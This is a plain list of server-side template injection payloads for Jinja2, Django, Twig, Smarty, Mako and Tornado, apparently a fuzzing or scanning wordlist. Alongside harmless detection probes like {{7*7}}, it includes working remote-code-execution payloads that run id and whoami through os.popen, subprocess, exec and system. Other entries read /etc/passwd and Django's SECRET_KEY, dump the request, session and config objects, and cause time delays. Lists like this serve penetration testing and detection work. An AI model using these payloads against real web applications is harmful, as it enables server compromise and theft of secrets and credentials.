# SSTI (Server-Side Template Injection) payloads
# Mathematical expressions
{{7*7}}
${7*7}
#{7*7}
%{7*7}
{{8*8}}
${8*8}
{{7*7*7}}
${7*7*7}

# Template engine specific
{{config}}
${config}
{{request}}
${request}
{{session}}
${session}

# Jinja2 specific
{{config.items()}}
{{request.environ}}
{{request.args}}
{{request.form}}
{{request.cookies}}

# Django specific
{{settings.SECRET_KEY}}
{{request.META}}
{{request.user}}

# Twig specific
{{app.request}}
{{app.session}}
{{dump(app)}}

# Smarty specific
{$smarty.version}
{$smarty.server}
{$smarty.get}
{$smarty.post}

# Mako specific
${self}
${context}
${request}

# Tornado specific
{{handler.request}}
{{handler.application}}

# RCE SSTI payloads (limited selection)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.__class__.__init__.__globals__['os'].popen('whoami').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].listdir('.')}}

# Django RCE
{{request.__class__.__init__.__globals__.os.popen('id').read()}}
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.os.popen('whoami').read()}}

# Twig RCE
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}
{{_self.env.enableDebug()}}{{_self.env.enableAutoReload()}}

# Smarty RCE
{php}echo `id`;{/php}
{php}system('whoami');{/php}
{php}phpinfo();{/php}

# Mako RCE
${__import__('os').popen('id').read()}
${__import__('subprocess').check_output('whoami', shell=True)}

# Detection payloads
{{7*7}}
${7*7}
#{7*7}
%{7*7}
{{8*8}}
${8*8}
{{9*9}}
${9*9}

# Polyglot payloads
${{7*7}}
#{{7*7}}
%{{7*7}}
{{7*'7'}}
${7*'7'}

# Error-inducing payloads
{{undefined_variable}}
${undefined_variable}
{{7/0}}
${7/0}
{{[].__class__}}
${[].__class__}

# Template syntax variations
{%7*7%}
<%=7*7%>
<#assign x=7*7>${x}
{{7*7|safe}}
${7*7?c}

# URL encoded versions
%7B%7B7*7%7D%7D
%24%7B7*7%7D
%23%7B7*7%7D

# Blind payloads (limited)
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['time'].sleep(5)}}
${__import__('time').sleep(5)}
{{config.__class__.__init__.__globals__['time'].sleep(5)}}
